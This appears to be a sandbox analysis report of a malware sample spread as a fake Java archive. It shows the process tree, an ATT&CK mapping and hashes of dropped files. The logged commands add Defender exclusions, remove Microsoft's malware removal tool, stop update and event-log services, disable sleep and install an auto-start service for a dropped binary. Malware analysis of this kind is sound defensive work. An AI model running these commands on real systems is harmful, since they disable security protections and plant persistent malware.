C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4428 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4520 -prefMapHandle 4512 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ede66de4-e1e8-4c34-a884-3d85eea3b5c7} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" utility3⤵
- Checks processor information in registry
PID:4872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4820 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94ebdeca-e885-4587-842d-628cabe4635c} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:3300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 4 -isForBrowser -prefsHandle 5688 -prefMapHandle 5684 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7caaee1a-c5ce-4461-907c-a9f9e762a43b} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:4952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5880 -prefMapHandle 5884 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a769583d-f9af-4fce-9515-d4edcbccfeff} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:4524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6228 -childID 6 -isForBrowser -prefsHandle 6376 -prefMapHandle 6120 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0eb9272-1e1a-4ed6-b390-e4af57d0b08a} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab3⤵PID:600
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x490 0x4141⤵
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4100
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\infected-fakejava.rar"1⤵
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4576 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0E198148\pass - 1512okul.txt2⤵PID:2512
-
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\java.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5140
-
C:\Users\Admin\Desktop\java8.exe"C:\Users\Admin\Desktop\java8.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:5512 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5440
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5752
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5576
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5900
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RLNALEWN"2⤵
- Launches sc.exe
PID:5936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"2⤵
- Launches sc.exe
PID:5940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:6088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RLNALEWN"2⤵
- Launches sc.exe
PID:5612
-
-
C:\Users\Admin\Desktop\optionsof.exe"C:\Users\Admin\Desktop\optionsof.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5984 -
C:\Windows\system32\resmon.exe"C:\Windows\system32\resmon.exe"2⤵PID:5200
-
C:\Windows\System32\perfmon.exe"C:\Windows\System32\perfmon.exe" /res3⤵
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exeC:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4428 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5644
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2488
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3272
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3116
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5880
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:2852
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:6092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4940
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"3⤵
- Executes dropped EXE
PID:5816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5936
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"3⤵
- Executes dropped EXE
PID:3532
-
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:6124
-
-
C:\Users\Admin\Desktop\java8.exe"C:\Users\Admin\Desktop\java8.exe"1⤵
- Executes dropped EXE
PID:3368
-
C:\Users\Admin\Desktop\optionsof.exe"C:\Users\Admin\Desktop\optionsof.exe"1⤵
- Executes dropped EXE
PID:5452
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a1fc422346c046c9ad0b280c14737e33
SHA14816ef13b5a2fe88c23665034fa1fc2d9a7d84f6
SHA256be9c8795a34299f2723a2cbcdf23c4e8eb47be742c3f25f5600e26b7b8c5922c
SHA5120a7ee050f3bb83f696d299f8b90dcdd9e68600a5304847f6e414e60baea1a01b0dfaf91686aa637f1bdba839ce5887220398be5cdb5f57c7462e025adf1a63cf
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\activity-stream.discovery_stream.json
Filesize19KB
MD597dd59c2754a70f1af90f632c572afd6
SHA1338d1abb0e40a817e0e2b478b700c5b1c33d67e6
SHA25677a12d9b80559a44f86bc7eb909242b89a3121a7c63795abae84c12e014a54c0
SHA5125f930ce8c1f0b5ad8d8c01234f4473a501cdf03c5031e9e0f34397b7382fa32cc10b453d4de2dac1ec03a3792a59728776b00277c76f12bc53397c68ad227688
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\cache2\entries\C1FF347D93D7CF38FB02D0A90D696E6329A39DEF
Filesize6.5MB
MD51731ae3bf6a86c7da10fc96b08d266af
SHA1851d70ad30548c6efe1bb8c5662089048b99f5b3
SHA256d46c74a041cd99588272c72a1e9599528e853134eb0da0f1252d7c19bdf031a0
SHA5122c86c268cd015d52b52e48cd441ab5159ef29bf57cadb01b27be4acaa35ee3b08b03673903b719d63a451741d7a3019363c0818523e57875cc99aac17834b461
-
Filesize
8B
MD563e1769180a210db4a56d1eb08e14125
SHA186f6adfcb66c2271872cefecdf2f1814e09babf9
SHA2560a01e0e9a891a0870c723deda48edf751029fae357d5bade40f1f080c64e6e7b
SHA51266e863888bfc4a8056dbc72f92232120ff9af68840107e3ec01a504e4a7af0440e82854848ff252b16e91319485aeada53b74915aa72d3bd96162be0c4b00129
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin
Filesize8KB
MD59cc6fcffdf8048e1cbc971ce004efa58
SHA1ea226dd862c4183d876bb230c76a6584449b866e
SHA256ea9a0b35afb127ea311350ace20e445ac3721e94c01158b455f1362492147cde
SHA5128d3e5a25c2bea8591506670687078444749fecb23c224455ae5cdeea3e97dea1422d0e71e76f95f95e422b5a26a42d0e6fbf8639057c6f0b4305dc5047e22cf5
-
Filesize
224KB
MD5243d94de36a81270987f66474f08c637
SHA1399b38f1fed2ed6c786395a78d950a23ae561082
SHA256186620c462e3c4c17ba06c269c9de41247ee4e105e4253732c02d1bdfced3c18
SHA51244bb85bcd7d316fbd34f4f66d731acb1d261adc6c99490fbbedcf446b11db18b30404e29a02d006d62c6fee21ba0ba53379fe82d17fbf687e30cab6798ac0e74
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\content-prefs.sqlite
Filesize256KB
MD5b5acd9cf58ba89e643e7b2e839e0707e
SHA182c2b9cbea4acb50b446b786818287be7b0b8b61
SHA2564d4fd87f1cdccc9f826ab7de2b3980db6fe4ed328f079ceb24f680557da9667e
SHA5121fdaf5173a2fa956e3793b3643b44d928a4c81a1599bdf4b057396bfca5948ce1097194dbb5f528959c8cf4e34d058922828236c6060b41510e9ea2cb9ed424b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5a8492f79b43123b81137b42593617ece
SHA179e7ba05aa3de68be2254fbd919e09a62dbda1f2
SHA2562f905708bcd5caedea439e68547e7d5720ce2eca0f80dd79f58bafe872e7c6d7
SHA51256c2964a50b9f2777e99ccdf966ba63027e6053d518689f44cd7da378381468c462506a9f1af5cae06e6e28da77574517a1faf5dc2bca5a1b91e16856a64caf4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5a71cd6ea9f68f133c84006e696f2a7d1
SHA17a419fceddd5c763b355f9da7cb9f625f405880b
SHA25674c74afe25f729130fb55342aefb7168a650e5acca993f245710373104630922
SHA512c8d8711d71e24554bfcaf9aac5c523b81f41b935b8d815a2c68aaa01ceee3550f1605761c93fd41d5e6925455abd12046ab7b3531861a4b0a86754daf7307a13
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\030acd78-c45c-4ba4-9c6a-aff012e8c9bd
Filesize26KB
MD5d8ab19113a81b067ada5f98658ec26b1
SHA118468a816f10074f88e7c725d51ea66a42749dff
SHA2567c1543e7f1abaa4526f39fa30566b96e3b0bf890fdb9c5703574b8545b2f8e61
SHA5129852e9de232cece66ee2df0567ded8ab7ce7febd66ec41f0c77b2e0cad4de7c2c78afbcc22a81971fa6d9656d573113f71506e28d00d53d5485caca9492b9936
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\39cf94bc-4793-4450-b129-8e6e4c1952d0
Filesize671B
MD5374e758977ff8b1e8a840ca5e6fd3534
SHA12a7744e3c7670a0399178318b7aeaec7418807f4
SHA2564edb53954d1dc21dd120215cb02b57c50a7e236eec02ddc616c9a26eab9045d9
SHA51249761da3ccc79e94c2c71863c2bf02ef9d08b198a5bad59d90d0cc840e87abb22bf6294fec3d2cdc0869bd79c429a1e1851c978e5ce17942aefc3c93ed1975c3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\aa472f28-a61d-45ec-bcc8-b61f2088b920
Filesize982B
MD5bc4265d69bf4340c4596683391fd33e6
SHA1a93d2f3a55a6eccb043e7002181779caab4dbd2a
SHA2564af94bf4df5203a71e8c66292522a3071112f3b5a4cd8572b22111a35399fb5c
SHA5121fc4e06733c9a23cdc316a096846c10a030f21ca2eedf4c457ed3890f659da638dec360190acdf8b32d0e9b83e9289aa423b184a5af319f29a393a8478d2f773
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\favicons.sqlite-wal
Filesize160KB
MD5755692c15bccba194657acc0604f341a
SHA104c16ead6e3a920aaefd9f838e0b382ae7638910
SHA25677efd40b975e85719a0e2caabc6c269cd77c5579f064e906f512499047febf8f
SHA512a4ce6f64c3d24370df2026dc2829179abfa8103c9b424b0d2e1c0c834df2702200f2996f539de4a2c3dc21f77aa829905115c13149b1f0b293b4b83ec1c66a7a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
96KB
MD5b2789cabba660f65016871eeb1339c49
SHA1ccde7953841e2fb4e5854c6ddd9e92cc3cbd3d13
SHA256124ef171956d1d78caf579b299dec87e5d3ddac730d44140b74a0d072f027f2a
SHA512b3a159d01f251bf06aaee214b7bb75fbbdd04ea7ae242e28bf2dcaf2841e39f0b63a08d8dcdcbbc3e383b87b03218988b13226441dd1373f88b1dc6f95e4a776
-
Filesize
928KB
MD50d48f8a671a43f4fb205958b9ce41449
SHA13d0aa6b0d329e4d68f559afa02711985e4e007b7
SHA25656167536e5ad966b0700e06323650309e9efdf409510b4f5f3d0628fcac1cf43
SHA512056613fab01f14bd1d6a714413f456bac7b1e502d1b2571c59bfb64167d16abe142a1951d0573ea69050db5416b4c6d65323f8a5749d483afd19257cd69dd2dd
-
Filesize
10KB
MD5b734bdedfe29711fa1ce6d4938dec583
SHA12d5c6ae219142c3660785101f10a19746fad769a
SHA256dc7ce6303807af689983d04cfd7faeeff7d0fa0ede1e98b3031730668c7031e6
SHA51243969231d7225681343301bfe575bdf53656b837e93f2e10b7eefaa29e7463d63531e69e1c2e39e32b45bfbf9026ae13444f08a4e34606795e5f78c8c6c9930b
-
Filesize
10KB
MD5accd1597f649b6d66ae78ec3cb1f17c6
SHA16fd62ef0f382729dec4ca11675b4f7579acb8540
SHA2564ccf0a7b4f03807168f3ec419c05007fa43d3c41e3422d5ad557b399e937b238
SHA51258ca4f05b460e9fc6c685794f2a3c819b0b80b0e3efc0403dc133f604787e797f3f4a12938f8edbbd8a4553f7ecf705d645fd10488db159bba98ae04029aef40
-
Filesize
11KB
MD533c7791cfd528f6ebd0c630d4e7b760f
SHA19f74feeea498c0c230c93e3ad9c61aa3c50702be
SHA256e51a0a6da98f5c8428fd235c253c15ee9bf8a563a9328317c14a3119b007a092
SHA51204fb2449d7122ee4e2ceb08363769ef61a57b1f7b0e38b5ff6b1685903c58e4a18dd5eb2c6127b78dd74b999f4703d402f91f2094de39e1243532539a813866e
-
Filesize
10KB
MD5908ec3cf8dd271b47b31e42315493883
SHA1301d8067c591b9021cbc7e7e8362c3259bc0edbf
SHA2569e572a295f5c6d0beb4460ba111ec795f3b5855849fec5cca96ace57a6d80556
SHA512c5818a9e85f89fc17f5d0ca4a7d4bad9ccd26fde0e099898dfef59e746d75749a76ea6b90fb7a301a936e32fc0bf6da8e1f429ba456b374e0f69337b6ce070bc
-
Filesize
64KB
MD5d7e5433a87ae3a30de4ab9adc47023bf
SHA14edaec48083abd90bc532ba8dd015fe209b0e439
SHA256c2da29c9c40900e9ae211f9083849b86355850faa503062d14ced549563f273e
SHA5129b28c36dbe02dff99519fac684c8cb88b8a40b06454524ebf79e576bd22cd94ae0eabb2655aba32bc118767f645d4e12da06764ca5d73c4e42fc2c2e0c343961
-
Filesize
4KB
MD5059b2ff6f7d80594a2c3ddf610eeb76c
SHA18a7709265c0067ac4371ebeb62b93fd2407f8a1e
SHA2561f15aa35b799dc7de17cb71291a4bc96a942048fa4f8ae43934ecfe5ff6c4a1b
SHA512e717c5dedb0d456fea52b70c4f7def798612bc64e3541fd444d53ccc2b1078a8bb100f3563bef7201353c01c600f66e891883931edbfdc7a748aad347ea7c911
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\storage\default\https+++mega.nz\cache\morgue\202\{6ffb74e7-738a-475c-a4df-361d40f155ca}.final
Filesize1KB
MD53efa9abd92666265dd81c4f4311a96f9
SHA141b6b716d67b93555e444cd453f3c6e3f8c9522c
SHA2565066b1841e8877db31312ef3af86f9bc9234c95071119e025764f45241a4e2e7
SHA5125961950f077501608a0f2975e7f69c483eeacc4eec4ac77fd650cc1131609501f87819f93ed23aa508a90426156abf038a859fac4112d2d4435bbb634027cd6c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\storage\default\https+++mega.nz\idb\3713173747_s_edmban.sqlite
Filesize48KB
MD5172a7b8f73eefb79d21e6d9ac2449f2e
SHA181615c01c2c09333a8e6c8ae9b01eb8ac9b81a28
SHA256291419c54094486f20c7cd0b4ce491bde37d915bff25aaf4cf3337cb79b71a34
SHA51280fee04e999bd899c4e2ba5ecbccb8f3ae5c32b46417447d1c1c06f96529cf0a09d385b55d7c668bae5c3068f42735c5d94e47e337993c2a4c899cd2f25eef1a
-
Filesize
2.1MB
MD5c1ae0c5c866ee8124e8953af55a2bb25
SHA101ae956bf031537a1676c7aa5eea3cd0d6169427
SHA2565db36c8703dbd06d51abf124bd4be8997271e134e73fececdc8939b41ed81900
SHA512c9412d068757fc684605e1563250564eddebc357d0cbd334e87911a9eeecb92ea8f0e108edcfe8a3a33f3edc1bc8dc4e69ebb9317fc2c34d049aed7f1645823e
-
Filesize
2.5MB
MD5c9a04bf748d1ee29a43ac3f0ddace478
SHA1891bd4e634a9c5fec1a3de80bff55c665236b58d
SHA256a6ce588a83f2c77c794e3584e8ac44e472d26cf301bb2bf0468bcabae55070bc
SHA512e17edb74f5cb4d8aabb4c775ec25a271f201da3adcb03541b1919526c0939694a768affc21c3066327e57c13bc9bb481074e51e4e78867df847b26f063b4c115
-
Filesize
120KB
MD59d310b4c99d8469119db4ed13f9b37dd
SHA10f1e492e9ebeaab5e5e3b09986b8f4f15cf71452
SHA2564a1d65d3123d0c7cf2cec44cffc6a4c813d436dd310794a9b8b9cee71ffe584a
SHA51288945336398dccbe197b3652a5f616250722b59175aae4f15031f6b167755fe8d60a923b16fc89fa81ef01f30332253f294b35af4e113a021ca37ba60cbb3629
-
Filesize
2.1MB
MD53014c025fa00a5f2e52bceedfabc4d8b
SHA17223674a1951fef19d5155c8a035e9b35d9678c0
SHA256cb46008a6658ab95340fd71f924f500404ba2a33252d4ce64585f15b370277d0
SHA51264327d78f21bfe657321370daa7ea87341856678aac496651e99bd306f95eca4a42278e7e70c6cb65884c2f8b12ea38defa7a1522b60bbc1db7e88a241bc6b6a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD56db666b8eea8c87bb44fc342dbda5fcb
SHA12536fb957e13fd2144e482970707286ca2625816
SHA256079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438
SHA51288fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5a4fe0be11fb007b21a2fafa6abe0bf6f
SHA1d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a
SHA256ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2
SHA5121c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD53aabbc53f153c703becb9616488ef34e
SHA15458dbecb68b916c53e44b37fc89ad26a5123a4a
SHA256cde2a470e3ed146760ac1fd4ae9f9f041bc37e6f2d5c73e75c1e2071aed0d821
SHA51214900c975a99ff70546a4a28048156aaaae3c84a68ab14be591833d8103e33df263114ae3ad5801d8076c8a526edcaa7a2f7595109d310a4252a4bed234f54ce
-
Filesize
1KB
MD593c488e6aa1f63b97a6f644ae0c6fdc1
SHA1715b27e9df4130a0a9cbadd8caa02ff6f52beee4
SHA256675bb3c33bfeb21684bfd7ee9048c7866bc57ffde08b32ff402e22f61c7afd54
SHA5129c755f97bc7d40bdf7af1712241f94d31b2cdf21f583770c08328b79dee56a6ed86105867b82141ff3a1bbaa59ae82fb30a5d6bd4093c8b564fcafd16f431112